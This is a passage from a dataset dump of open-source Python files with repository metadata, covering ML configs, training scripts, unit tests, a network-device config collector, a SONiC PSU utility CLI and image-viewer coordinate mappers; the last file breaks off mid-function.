max_stars_repo_path
stringlengths 3
269
| max_stars_repo_name
stringlengths 4
119
| max_stars_count
int64 0
191k
| id
stringlengths 1
7
| content
stringlengths 6
1.05M
| score
float64 0.23
5.13
| int_score
int64 0
5
|
---|---|---|---|---|---|---|
configs/efficientnet/retinanet_effb3_fpn_crop896_8x4_1x_coco.py | chenxinfeng4/mmdetection | 6 | 11300 | <filename>configs/efficientnet/retinanet_effb3_fpn_crop896_8x4_1x_coco.py
_base_ = [
'../_base_/models/retinanet_r50_fpn.py',
'../_base_/datasets/coco_detection.py', '../_base_/default_runtime.py'
]
cudnn_benchmark = True
norm_cfg = dict(type='BN', requires_grad=True)
checkpoint = 'https://download.openmmlab.com/mmclassification/v0/efficientnet/efficientnet-b3_3rdparty_8xb32-aa_in1k_20220119-5b4887a0.pth' # noqa
model = dict(
backbone=dict(
_delete_=True,
type='EfficientNet',
arch='b3',
drop_path_rate=0.2,
out_indices=(3, 4, 5),
frozen_stages=0,
norm_cfg=dict(
type='SyncBN', requires_grad=True, eps=1e-3, momentum=0.01),
norm_eval=False,
init_cfg=dict(
type='Pretrained', prefix='backbone', checkpoint=checkpoint)),
neck=dict(
in_channels=[48, 136, 384],
start_level=0,
out_channels=256,
relu_before_extra_convs=True,
no_norm_on_lateral=True,
norm_cfg=norm_cfg),
bbox_head=dict(type='RetinaSepBNHead', num_ins=5, norm_cfg=norm_cfg),
# training and testing settings
train_cfg=dict(assigner=dict(neg_iou_thr=0.5)))
# dataset settings
img_norm_cfg = dict(
mean=[123.675, 116.28, 103.53], std=[58.395, 57.12, 57.375], to_rgb=True)
img_size = (896, 896)
train_pipeline = [
dict(type='LoadImageFromFile'),
dict(type='LoadAnnotations', with_bbox=True),
dict(
type='Resize',
img_scale=img_size,
ratio_range=(0.8, 1.2),
keep_ratio=True),
dict(type='RandomCrop', crop_size=img_size),
dict(type='RandomFlip', flip_ratio=0.5),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size=img_size),
dict(type='DefaultFormatBundle'),
dict(type='Collect', keys=['img', 'gt_bboxes', 'gt_labels']),
]
test_pipeline = [
dict(type='LoadImageFromFile'),
dict(
type='MultiScaleFlipAug',
img_scale=img_size,
flip=False,
transforms=[
dict(type='Resize', keep_ratio=True),
dict(type='RandomFlip'),
dict(type='Normalize', **img_norm_cfg),
dict(type='Pad', size=img_size),
dict(type='ImageToTensor', keys=['img']),
dict(type='Collect', keys=['img']),
])
]
data = dict(
samples_per_gpu=4,
workers_per_gpu=4,
train=dict(pipeline=train_pipeline),
val=dict(pipeline=test_pipeline),
test=dict(pipeline=test_pipeline))
# optimizer
optimizer_config = dict(grad_clip=None)
optimizer = dict(
type='SGD',
lr=0.04,
momentum=0.9,
weight_decay=0.0001,
paramwise_cfg=dict(norm_decay_mult=0, bypass_duplicate=True))
# learning policy
lr_config = dict(
policy='step',
warmup='linear',
warmup_iters=1000,
warmup_ratio=0.1,
step=[8, 11])
# runtime settings
runner = dict(type='EpochBasedRunner', max_epochs=12)
# NOTE: This variable is for automatically scaling LR,
# USER SHOULD NOT CHANGE THIS VALUE.
default_batch_size = 32 # (8 GPUs) x (4 samples per GPU)
| 1.382813 | 1 |
tests/test_model.py | Sebastiencreoff/mongo_tool | 0 | 11301 | <gh_stars>0
#!/usr/bin/env python
import datetime
import mock
import mom
class ExampleClass(mom.Model):
JSON_SCHEMA = {
'$schema': 'http://json-schema.org/schema#',
'title': 'Test class for JSON',
'type': 'object',
'properties': {
'value_datetime': {'type': ['datetime', 'null']},
'value_int': {'type': ['number', 'null']},
'value_str': {'type': ['string', 'null']}}
}
EXCLUDED_KEYS = set('to_dict')
def __init__(self, data=None, value_int=None):
self.value_datetime = None
self.value_int = value_int
self.value_str = None
super().__init__(data=data)
def to_dict(self):
result = super().to_dict()
result.update({
'value_datetime': self.value_datetime,
'value_int': self.value_int,
'value_str': self.value_str})
return result
@mom.Model.with_update
def updates(self, value_datetime, value_str):
print('save_buy function')
self.value_datetime = value_datetime
self.value_str = value_str
def test_init():
mom.Model.session = mock.MagicMock()
# Test without data
obj = ExampleClass()
assert mom.Model.session.add.call_count == 1
assert mom.Model.session.update.call_count == 0
assert not obj.read_only
assert obj.id()
# Test with data
mom.Model.session.reset_mock()
obj2 = ExampleClass(data=obj.to_dict())
assert mom.Model.session.add.call_count == 0
assert mom.Model.session.update.call_count == 0
assert obj2.read_only
assert obj2.id() == obj.id()
def test_single_attr():
mom.Model.session = mock.MagicMock()
obj = ExampleClass()
mom.Model.session.reset_mock()
# Update one parameter.
obj.value_datetime = datetime.datetime.now()
assert mom.Model.session.add.call_count == 0
assert mom.Model.session.update.call_count == 1
def test_method():
mom.Model.session = mock.MagicMock()
obj = ExampleClass()
mom.Model.session.reset_mock()
# Update parameters with function.
obj.updates(value_datetime=datetime.datetime.now(), value_str='value')
assert mom.Model.session.add.call_count == 0
assert mom.Model.session.update.call_count == 1
| 2.5 | 2 |
src/koeda/utils/stopwords.py | toriving/KoEDA | 48 | 11302 | import os
import json
STOPWORDS_JSON_PATH = os.path.join(
os.path.dirname(os.path.abspath(__file__)), os.pardir, "corpora/stopwords.json"
)
with open(STOPWORDS_JSON_PATH, "r", encoding="utf-8") as f:
STOPWORD = json.load(f)["stopwords"]
| 2.3125 | 2 |
glue/core/tests/test_message.py | ejeschke/glue | 3 | 11303 | <reponame>ejeschke/glue
from __future__ import absolute_import, division, print_function
import pytest
from .. import message as msg
def test_invalid_subset_msg():
with pytest.raises(TypeError) as exc:
msg.SubsetMessage(None)
assert exc.value.args[0].startswith('Sender must be a subset')
def test_invalid_data_msg():
with pytest.raises(TypeError) as exc:
msg.DataMessage(None)
assert exc.value.args[0].startswith('Sender must be a data')
def test_invalid_data_collection_msg():
with pytest.raises(TypeError) as exc:
msg.DataCollectionMessage(None)
assert exc.value.args[0].startswith('Sender must be a DataCollection')
| 2.109375 | 2 |
fabfile/config.py | kurochan/config-collector | 1 | 11304 | <gh_stars>1-10
# -*- coding: utf-8 -*-
import os
import util
from fabric.api import *
from fabric.state import output
from fabric.colors import *
from base import BaseTask
from helper.print_helper import task_puts
class CollectConfig(BaseTask):
"""
collect configuration
"""
name = "collect"
def run_task(self, *args, **kwargs):
host_config = env.inventory.get_variables(env.host)
hostname = host_config['ssh_host']
if not util.tcping(hostname, 22, 1):
task_puts("host {0} does not exist. skip...".format(hostname))
return
config = self.get_config(hostname, host_config['ssh_user'], host_config['ssh_pass'], host_config['exec_pass'], host_config['type'])
self.write_config(env.host, config)
# print config
def get_config(self, hostname, ssh_user, ssh_pass, exec_pass, os_type):
script_name = "dump-config-cisco-{0}.sh".format(os_type)
config = local(os.path.dirname(os.path.abspath(__file__)) + "/../bin/{0} {1} {2} {3}".format(script_name, ssh_user, hostname, ssh_pass), capture = True)
return config
def write_config(self, hostname, config):
output_dir = os.path.dirname(os.path.abspath(__file__)) + "/../tmp/config"
local("mkdir -p {0}".format(output_dir))
file = open("{0}/{1}.txt".format(output_dir, hostname), 'w')
file.write(str(config))
file.close()
collect = CollectConfig()
| 2.203125 | 2 |
python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py | LWhite027/PaddleBox | 10 | 11305 | <filename>python/paddle/fluid/tests/unittests/ir/inference/test_trt_transpose_flatten_concat_fuse_pass.py
# Copyright (c) 2020 PaddlePaddle Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import unittest
import numpy as np
from inference_pass_test import InferencePassTest
import paddle.fluid as fluid
import paddle.fluid.core as core
from paddle.fluid.core import AnalysisConfig
class TransposeFlattenConcatFusePassTRTTest(InferencePassTest):
def setUp(self):
with fluid.program_guard(self.main_program, self.startup_program):
data1 = fluid.data(
name="data1", shape=[8, 32, 128], dtype="float32")
data2 = fluid.data(
name="data2", shape=[8, 32, 128], dtype="float32")
trans1 = fluid.layers.transpose(data1, perm=[2, 1, 0])
trans2 = fluid.layers.transpose(data2, perm=[2, 1, 0])
flatt1 = fluid.layers.flatten(trans1)
flatt2 = fluid.layers.flatten(trans2)
concat_out = fluid.layers.concat([flatt1, flatt2])
# There is no parameters for above structure.
# Hence, append a batch_norm to avoid failure caused by load_combined.
out = fluid.layers.batch_norm(concat_out, is_test=True)
self.feeds = {
"data1": np.random.random([8, 32, 128]).astype("float32"),
"data2": np.random.random([8, 32, 128]).astype("float32")
}
self.enable_trt = True
self.trt_parameters = TransposeFlattenConcatFusePassTRTTest.TensorRTParam(
1 << 20, 8, 3, AnalysisConfig.Precision.Float32, False, False)
self.fetch_list = [out]
def test_check_output(self):
# There is no cpu pass for transpose_flatten_concat_fuse
if core.is_compiled_with_cuda():
use_gpu = True
self.check_output_with_option(use_gpu)
if __name__ == "__main__":
unittest.main()
| 2.265625 | 2 |
src/stage_02_base_model_creation.py | TUCchkul/Dog-Cat-Classification-with-MLflow | 0 | 11306 | import argparse
import os
import shutil
from tqdm import tqdm
import logging
from src.utils.common import read_yaml, create_directories
import random
from src.utils.model import log_model_summary
import tensorflow as tf
STAGE= "Base Model Creation"
logging.basicConfig(
filename=os.path.join("logs",'running_logs.log'),
level=logging.INFO,
format="[%(asctime)s: %(levelname)s: %(module)s]: %(message)s",
filemode="a")
def main(config_path):
config=read_yaml(config_path)
params=config["params"]
logging.info("Layer Defined")
LAYERS=[
tf.keras.layers.Input(shape=tuple(params["img_shape"])),
tf.keras.layers.Conv2D(filters=32, kernel_size=(3,3), activation="relu"),
tf.keras.layers.MaxPool2D(pool_size=(2,2)),
tf.keras.layers.Conv2D(32,(3,3), activation="relu"),
tf.keras.layers.MaxPool2D(pool_size=(2,2)),
tf.keras.layers.Flatten(),
tf.keras.layers.Dense(8, activation="relu"),
tf.keras.layers.Dense(2, activation="softmax")
]
classifier=tf.keras.Sequential(LAYERS)
logging.info(f"Base Model Summary:\n{log_model_summary(classifier)}")
classifier.compile(optimizer=tf.keras.optimizers.Adam(params["lr"]),
loss=params["loss"],
metrics=params["metrics"]
)
path_to_model_dir=os.path.join(config["data"]["local_dir"],
config["data"]["model_dir"]
)
create_directories([path_to_model_dir])
path_to_model=os.path.join(path_to_model_dir,
config["data"]["init_model_file"])
classifier.save(path_to_model)
logging.info(f"model is save at : {path_to_model}")
if __name__=="__main__":
args=argparse.ArgumentParser()
args.add_argument("--config", "-c", default="configs/config.yaml")
parsed_args=args.parse_args()
try:
logging.info("\n*********************")
logging.info(f">>>>>>>stage {STAGE} started <<<<<<<")
main(config_path=parsed_args.config)
logging.info(f">>>>>>>> stage {STAGE} completed! <<<<<<<<\n")
except Exception as e:
logging.exception(e)
raise e
| 2.140625 | 2 |
test_calculator.py | Kidatoy/Advanced-Calculator | 0 | 11307 | <reponame>Kidatoy/Advanced-Calculator
import unittest # https://docs.python.org/3/library/unittest.html
from modules.calculator import Calculator as Calc
class TestCalculator(unittest.TestCase):
"""
Test Driven Development Unittest File
Module: Calculator
Updated: 12/16/2019
Author: <NAME>
"""
def test_addition(self):
"""
Evaluate addition corner cases
"""
self.assertEqual(2, Calc().eval('1+1'))
self.assertEqual(2, Calc().eval('1.0+1.0'))
self.assertEqual(0, Calc().eval('-1+1'))
self.assertEqual(-2, Calc().eval('-1+-1'))
def test_subtraction(self):
"""
Evaluate subtraction corner cases
"""
self.assertEqual(0, Calc().eval('1-1'))
self.assertEqual(-2, Calc().eval('-1-1'))
self.assertEqual(0, Calc().eval('-1--1'))
def test_multiplication(self):
"""
Evaluate multiplication corner cases
"""
self.assertEqual(0, Calc().eval('1*0'))
self.assertEqual(0, Calc().eval('0*-1'))
self.assertEqual(1, Calc().eval('1*1'))
self.assertEqual(-1, Calc().eval('-1*1'))
self.assertEqual(1, Calc().eval('-1*-1'))
self.assertEqual(1, Calc().eval('.25*4'))
def test_division(self):
"""
Test division corner cases
Note: division by zero is handled in test_exceptions
"""
self.assertEqual(1, Calc().eval('1/1'))
self.assertEqual(.25, Calc().eval('1/4'))
self.assertEqual(-1, Calc().eval('-1/1'))
self.assertEqual(1, Calc().eval('-1/-1'))
self.assertEqual(0, Calc().eval('0/-1'))
def test_exponents(self):
"""
Test exponent corner cases
"""
self.assertEqual(1, Calc().eval('2^0'))
self.assertEqual(2, Calc().eval('2^1'))
self.assertEqual(4, Calc().eval('2^2'))
self.assertEqual(.5, Calc().eval('2^-1'))
self.assertEqual(4, Calc().eval('-2^2'))
def test_parentheses(self):
"""
Test parentheses corner cases
"""
self.assertEqual(5.0, Calc().eval('(4.0)+1'))
self.assertEqual(3.0, Calc().eval('(4+1)-2'))
self.assertEqual(5.0, Calc().eval('(5+-5)+5'))
self.assertEqual(-5.0, Calc().eval('(-10+3)+2'))
self.assertEqual(-26.0, Calc().eval('10-(3*2)^2'))
def test_pi(self):
"""
Test pi corner cases
"""
self.assertEqual(4.1415926535, Calc().eval('(pi)+1'))
self.assertEqual(1.1415926535, Calc().eval('(pi)-2'))
self.assertEqual(3.1415926535, Calc().eval('(pi+-5)+5'))
self.assertEqual(1.8584073465, Calc().eval('(-pi+3)+2'))
self.assertEqual(-29.478417602100684, Calc().eval('10-(pi*2)^2'))
self.assertEqual(1.57079632675, Calc().eval('pi/2'))
def test_e(self):
"""
Test e corner cases
"""
self.assertEqual(3.7182818284, Calc().eval('(e)+1'))
self.assertEqual(0.7182818283999999, Calc().eval('(e)-2'))
self.assertEqual(2.7182818284, Calc().eval('(e+-5)+5'))
self.assertEqual(2.2817181716, Calc().eval('(-e+3)+2'))
self.assertEqual(-19.556224394438587, Calc().eval('10-(e*2)^2'))
self.assertEqual(1.3591409142, Calc().eval('e/2'))
def test_phi(self):
"""
Test phi corner cases
"""
self.assertEqual(2.6180339886999997, Calc().eval('(phi)+1'))
self.assertEqual(-0.3819660113000001, Calc().eval('(phi)-2'))
self.assertEqual(1.6180339886999997, Calc().eval('(phi+-5)+5'))
self.assertEqual(3.3819660113000003, Calc().eval('(-phi+3)+2'))
self.assertEqual(-0.47213595435372646, Calc().eval('10-(phi*2)^2'))
self.assertEqual(0.80901699435, Calc().eval('phi/2'))
| 3.859375 | 4 |
pddf_psuutil/main.py | deran1980/sonic-utilities | 0 | 11308 | <reponame>deran1980/sonic-utilities
#!/usr/bin/env python3
#
# main.py
#
# Command-line utility for interacting with PSU Controller in PDDF mode in SONiC
#
try:
import sys
import os
import click
from tabulate import tabulate
from utilities_common.util_base import UtilHelper
except ImportError as e:
raise ImportError("%s - required module not found" % str(e))
VERSION = '2.0'
SYSLOG_IDENTIFIER = "psuutil"
PLATFORM_SPECIFIC_MODULE_NAME = "psuutil"
PLATFORM_SPECIFIC_CLASS_NAME = "PsuUtil"
# Global platform-specific psuutil class instance
platform_psuutil = None
platform_chassis = None
# Wrapper APIs so that this util is suited to both 1.0 and 2.0 platform APIs
def _wrapper_get_num_psus():
if platform_chassis is not None:
try:
return platform_chassis.get_num_psus()
except NotImplementedError:
pass
return platform_psuutil.get_num_psus()
def _wrapper_get_psu_name(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_name()
except NotImplementedError:
pass
return "PSU {}".format(idx)
def _wrapper_get_psu_presence(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_presence()
except NotImplementedError:
pass
return platform_psuutil.get_psu_presence(idx)
def _wrapper_get_psu_status(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_status()
except NotImplementedError:
pass
return platform_psuutil.get_psu_status(idx)
def _wrapper_get_psu_model(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_model()
except NotImplementedError:
pass
return platform_psuutil.get_model(idx)
def _wrapper_get_psu_mfr_id(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_mfr_id()
except NotImplementedError:
pass
return platform_psuutil.get_mfr_id(idx)
def _wrapper_get_psu_serial(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_serial()
except NotImplementedError:
pass
return platform_psuutil.get_serial(idx)
def _wrapper_get_psu_direction(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1)._fan_list[0].get_direction()
except NotImplementedError:
pass
return platform_psuutil.get_direction(idx)
def _wrapper_get_output_voltage(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_voltage()
except NotImplementedError:
pass
return platform_psuutil.get_output_voltage(idx)
def _wrapper_get_output_current(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_current()
except NotImplementedError:
pass
return platform_psuutil.get_output_current(idx)
def _wrapper_get_output_power(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1).get_power()
except NotImplementedError:
pass
return platform_psuutil.get_output_power(idx)
def _wrapper_get_fan_rpm(idx, fan_idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx-1)._fan_list[fan_idx-1].get_speed_rpm()
except NotImplementedError:
pass
return platform_psuutil.get_fan_rpm(idx, fan_idx)
def _wrapper_dump_sysfs(idx):
if platform_chassis is not None:
try:
return platform_chassis.get_psu(idx).dump_sysfs()
except NotImplementedError:
pass
return platform_psuutil.dump_sysfs()
# ==================== CLI commands and groups ====================
# This is our main entrypoint - the main 'psuutil' command
@click.group()
def cli():
"""psuutil - Command line utility for providing PSU status"""
global platform_psuutil
global platform_chassis
if os.geteuid() != 0:
click.echo("Root privileges are required for this operation")
sys.exit(1)
# Load the helper class
helper = UtilHelper()
if not helper.check_pddf_mode():
click.echo("PDDF mode should be supported and enabled for this platform for this operation")
sys.exit(1)
# Load new platform api class
try:
import sonic_platform.platform
platform_chassis = sonic_platform.platform.Platform().get_chassis()
except Exception as e:
click.echo("Failed to load chassis due to {}".format(str(e)))
# Load platform-specific psuutil class if 2.0 implementation is not present
if platform_chassis is None:
try:
platform_psuutil = helper.load_platform_util(PLATFORM_SPECIFIC_MODULE_NAME, PLATFORM_SPECIFIC_CLASS_NAME)
except Exception as e:
click.echo("Failed to load {}: {}".format(PLATFORM_SPECIFIC_MODULE_NAME, str(e)))
sys.exit(2)
# 'version' subcommand
@cli.command()
def version():
"""Display version info"""
click.echo("PDDF psuutil version {0}".format(VERSION))
# 'numpsus' subcommand
@cli.command()
def numpsus():
"""Display number of supported PSUs on device"""
click.echo(_wrapper_get_num_psus())
# 'status' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def status(index):
"""Display PSU status"""
supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
psu_ids = []
if (index < 0):
psu_ids = supported_psu
else:
psu_ids = [index]
header = ['PSU', 'Status']
status_table = []
for psu in psu_ids:
msg = ""
psu_name = _wrapper_get_psu_name(psu)
if psu not in supported_psu:
click.echo("Error! The {} is not available on the platform.\n" \
"Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
continue
presence = _wrapper_get_psu_presence(psu)
if presence:
oper_status = _wrapper_get_psu_status(psu)
msg = 'OK' if oper_status else "NOT OK"
else:
msg = 'NOT PRESENT'
status_table.append([psu_name, msg])
if status_table:
click.echo(tabulate(status_table, header, tablefmt="simple"))
# 'mfrinfo' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def mfrinfo(index):
"""Display PSU manufacturer info"""
supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
psu_ids = []
if (index < 0):
psu_ids = supported_psu
else:
psu_ids = [index]
for psu in psu_ids:
psu_name = _wrapper_get_psu_name(psu)
if psu not in supported_psu:
click.echo("Error! The {} is not available on the platform.\n" \
"Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
continue
status = _wrapper_get_psu_status(psu)
if not status:
click.echo("{} is Not OK\n".format(psu_name))
continue
model_name = _wrapper_get_psu_model(psu)
mfr_id = _wrapper_get_psu_mfr_id(psu)
serial_num = _wrapper_get_psu_serial(psu)
airflow_dir = _wrapper_get_psu_direction(psu)
click.echo("{} is OK\nManufacture Id: {}\n" \
"Model: {}\nSerial Number: {}\n" \
"Fan Direction: {}\n".format(psu_name, mfr_id, model_name, serial_num, airflow_dir.capitalize()))
# 'seninfo' subcommand
@cli.command()
@click.option('-i', '--index', default=-1, type=int, help="the index of PSU")
def seninfo(index):
"""Display PSU sensor info"""
supported_psu = list(range(1, _wrapper_get_num_psus() + 1))
psu_ids = []
if (index < 0):
psu_ids = supported_psu
else:
psu_ids = [index]
for psu in psu_ids:
psu_name = _wrapper_get_psu_name(psu)
if psu not in supported_psu:
click.echo("Error! The {} is not available on the platform.\n" \
"Number of supported PSU - {}.".format(psu_name, len(supported_psu)))
continue
oper_status = _wrapper_get_psu_status(psu)
if not oper_status:
click.echo("{} is Not OK\n".format(psu_name))
continue
v_out = _wrapper_get_output_voltage(psu) * 1000
i_out = _wrapper_get_output_current(psu) * 1000
p_out = _wrapper_get_output_power(psu) * 1000
fan1_rpm = _wrapper_get_fan_rpm(psu, 1)
click.echo("{} is OK\nOutput Voltage: {} mv\n" \
"Output Current: {} ma\nOutput Power: {} mw\n" \
"Fan1 Speed: {} rpm\n".format(psu_name, v_out, i_out, p_out, fan1_rpm))
@cli.group()
def debug():
"""pddf_psuutil debug commands"""
pass
@debug.command()
def dump_sysfs():
"""Dump all PSU related SysFS paths"""
for psu in range(_wrapper_get_num_psus()):
status = _wrapper_dump_sysfs(psu)
if status:
for i in status:
click.echo(i)
if __name__ == '__main__':
cli()
| 2.296875 | 2 |
gifbox/core/serializers.py | timmygee/gifbox | 0 | 11309 | <gh_stars>0
from rest_framework import serializers
from versatileimagefield.serializers import VersatileImageFieldSerializer
from .models import Image, AnimatedGif
class ImageSerializer(serializers.ModelSerializer):
class Meta:
model = Image
fields = ('image',)
image = VersatileImageFieldSerializer(
sizes=[
('full_size', 'url'),
('thumbnail', 'thumbnail__200x200'),
]
)
class AnimatedGifSerializer(serializers.ModelSerializer):
class Meta:
model = AnimatedGif
fields = ('id', 'image', 'created', 'period')
image = VersatileImageFieldSerializer(
sizes=[
('full_size_url', 'url'),
('thumbnail_url', 'thumbnail__200x200'),
]
)
| 2.125 | 2 |
ginga/canvas/coordmap.py | saimn/ginga | 0 | 11310 | <filename>ginga/canvas/coordmap.py
#
# coordmap.py -- coordinate mappings.
#
# This is open-source software licensed under a BSD license.
# Please see the file LICENSE.txt for details.
#
from ginga import trcalc
from ginga.util import wcs
from ginga.util.six.moves import map
__all__ = ['CanvasMapper', 'DataMapper', 'OffsetMapper', 'WCSMapper']
class CanvasMapper(object):
"""A coordinate mapper that maps to the viewer's canvas in
canvas coordinates.
"""
def __init__(self, viewer):
# record the viewer just in case
self.viewer = viewer
def to_canvas(self, canvas_x, canvas_y):
return (canvas_x, canvas_y)
def to_data(self, canvas_x, canvas_y):
return self.viewer.get_data_xy(canvas_x, canvas_y)
def data_to(self, data_x, data_y):
return self.viewer.get_canvas_xy(data_x, data_y)
def offset_pt(self, pt, xoff, yoff):
x, y = pt
return x + xoff, y + yoff
def rotate_pt(self, x, y, theta, xoff=0, yoff=0):
# TODO? Not sure if it is needed with this mapper type
return x, y
class CartesianMapper(object):
"""A coordinate mapper that maps to the viewer's canvas
in Cartesian coordinates that do not scale (unlike DataMapper).
"""
def __init__(self, viewer):
self.viewer = viewer
def to_canvas(self, crt_x, crt_y):
return self.viewer.offset_to_window(crt_x, crt_y)
def to_data(self, crt_x, crt_y):
return self.viewer.offset_to_data(crt_x, crt_y)
def data_to(self, data_x, data_y):
return self.viewer.data_to_offset(data_x, data_y)
def offset_pt(self, pt, xoff, yoff):
x, y = pt
return x + xoff, y + yoff
def rotate_pt(self, x, y, theta, xoff=0, yoff=0):
return trcalc.rotate_pt(x, y, theta, xoff=xoff, yoff=yoff)
class DataMapper(object):
"""A coordinate mapper that maps to the viewer's canvas
in data coordinates.
"""
def __init__(self, viewer):
self.viewer = viewer
def to_canvas(self, data_x, data_y):
return self.viewer.canvascoords(data_x, data_y)
def to_data(self, data_x, data_y):
return data_x, data_y
def data_to(self, data_x, data_y):
return data_x, data_y
def offset_pt(self, pt, xoff, yoff):
x, y = pt
return x + xoff, y + yoff
def rotate_pt(self, x, y, theta, xoff=0, yoff=0):
return trcalc.rotate_pt(x, y, theta, xoff=xoff, yoff=yoff)
class OffsetMapper(object):
"""A coordinate mapper that maps to the viewer's canvas
in data coordinates that are offsets relative to some other
reference object.
"""
def __init__(self, viewer, refobj):
# TODO: provide a keyword arg to specify which point in the obj
self.viewer = viewer
self.refobj = refobj
def calc_offsets(self, points):
ref_x, ref_y = self.refobj.get_reference_pt()
#return map(lambda x, y: x - ref_x, y - ref_y, points)
def _cvt(pt):
x, y = pt
return x - ref_x, y - ref_y
return map(_cvt, points)
def to_canvas(self, delta_x, delta_y):
data_x, data_y = self.to_data(delta_x, delta_y)
return self.viewer.canvascoords(data_x, data_y)
def to_data(self, delta_x, delta_y):
ref_x, ref_y = self.refobj.get_reference_pt()
data_x, data_y = self.refobj.crdmap.to_data(ref_x, ref_y)
return data_x + delta_x, data_y + delta_y
## def data_to(self, data_x, data_y):
## ref_x, ref_y = self.refobj.get_reference_pt()
## return data_x - ref_data_x, data_y - ref_data_y
def offset_pt(self, pt, xoff, yoff):
# A no-op because this object's points are always considered
# relative to the reference object
return pt
def rotate_pt(self, x, y, theta, xoff=0, yoff=0):
# TODO? Not sure if it is needed with this mapper type
return x, y
class WCSMapper(DataMapper):
"""A coordinate mapper that maps to the viewer's canvas
in WCS coordinates.
"""
def to_canvas(self, lon, lat):
data_x, data_y = self.to_data(lon, lat)
return super(WCSMapper, self).to_canvas(data_x, data_y)
def to_data(self, lon, lat):
image = self.viewer.get_image()
data_x, data_y = image.radectopix(lon, lat)
return data_x, data_y
def data_to(self, data_x, data_y):
image = self.viewer.get_image()
lon, lat = image.pixtoradec(data_x, data_y)
return lon, lat
def offset_pt(self, pt, xoff, yoff):
x, y = pt
return wcs.add_offset_radec(x, y, xoff, yoff)
def rotate_pt(self, x, y, theta, xoff=0, yoff=0):
# TODO: optomize by rotating in WCS space
xoff, yoff = self.to_data(xoff, yoff)
x, y = super(WCSMapper, self).rotate_pt(x, y, theta,
xoff=xoff, yoff=yoff)
x, y = self.data_to(x, y)
return x, y
#END
| 2.671875 | 3 |
train.py | zpc-666/Paddle-Stochastic-Depth-ResNet110 | 0 | 11311 | # coding: utf-8
# Copyright (c) 2021 PaddlePaddle Authors. All Rights Reserved.
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
# http://www.apache.org/licenses/LICENSE-2.0
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import os
import paddle
import paddle.nn as nn
import importlib
from visualdl import LogWriter
import numpy as np
import pickle
from models import utils
from config import parser_args
def train_model(args):
if args.dataset=='cifar10':
root = os.path.join(args.data_dir, args.dataset, 'cifar-10-python.tar.gz')
print(args)
model = importlib.import_module('models.__init__').__dict__[args.net](
None, drop_path_rate=args.drop_path_rate, use_drop_path=args.use_drop_path, use_official_implement=args.use_official_implement)
train_loader, val_loader, test_loader = importlib.import_module(
'dataset.' + args.dataset).__dict__['load_data'](root, args.train_batch_size,
args.test_batch_size, has_val_dataset=args.has_val_dataset)
writer = LogWriter(logdir=args.save_dir)
criterion = nn.CrossEntropyLoss()
if args.optimizer == 'sgd':
lr_scheduler = paddle.optimizer.lr.MultiStepDecay(learning_rate=args.learning_rate, milestones=args.milestones, gamma=args.gamma)
optimizer = paddle.optimizer.Momentum(parameters=model.parameters(),
learning_rate=lr_scheduler,
momentum=args.momentum,
weight_decay=args.weight_decay,
use_nesterov=args.nesterov)
elif args.optimizer == 'adam':
optimizer = paddle.optimizer.AdamW(parameters=model.parameters(),
learning_rate=args.learning_rate,
weight_decay=args.weight_decay)
else:
raise ValueError("optimizer must be sgd or adam.")
best_acc = 0
for i in range(args.epochs):
utils.train_per_epoch(train_loader, model, criterion, optimizer, i, writer)
top1_acc, top5_acc = utils.validate(val_loader, model, criterion)
if args.optimizer == 'sgd':
lr_scheduler.step()
if best_acc < top1_acc:
paddle.save(model.state_dict(),
args.save_dir + '/model_best.pdparams')
best_acc = top1_acc
if not args.save_best:
if (i + 1) % args.save_interval == 0 and i != 0:
paddle.save(model.state_dict(),
args.save_dir + '/model.pdparams')
writer.add_scalar('val-acc', top1_acc, i)
writer.add_scalar('val-top5-acc', top5_acc, i)
writer.add_scalar('lr', optimizer.get_lr(), i)
print('best acc: {:.2f}'.format(best_acc))
model.set_state_dict(paddle.load(args.save_dir + '/model_best.pdparams'))
top1_acc, top5_acc = utils.validate(test_loader, model, criterion)
with open(os.path.join(args.save_dir, 'test_acc.txt'), 'w') as f:
f.write('test_acc:'+str(top1_acc))
def train_hl_api(args):
if args.dataset=='cifar10':
root = os.path.join(args.data_dir, args.dataset, 'cifar-10-python.tar.gz')
print(args)
model = importlib.import_module('models.__init__').__dict__[args.net](
None, drop_path_rate=args.drop_path_rate, use_drop_path=args.use_drop_path, use_official_implement=args.use_official_implement)
train_loader, val_loader, test_loader = importlib.import_module(
'dataset.' + args.dataset).__dict__['load_data'](root, args.train_batch_size,
args.test_batch_size, has_val_dataset=args.has_val_dataset)
criterion = nn.CrossEntropyLoss()
if args.optimizer == 'sgd':
# 因为高层API是每个iter就执行lr_scheduler.step(),故这里把间隔调成m*len(train_loader)才合适
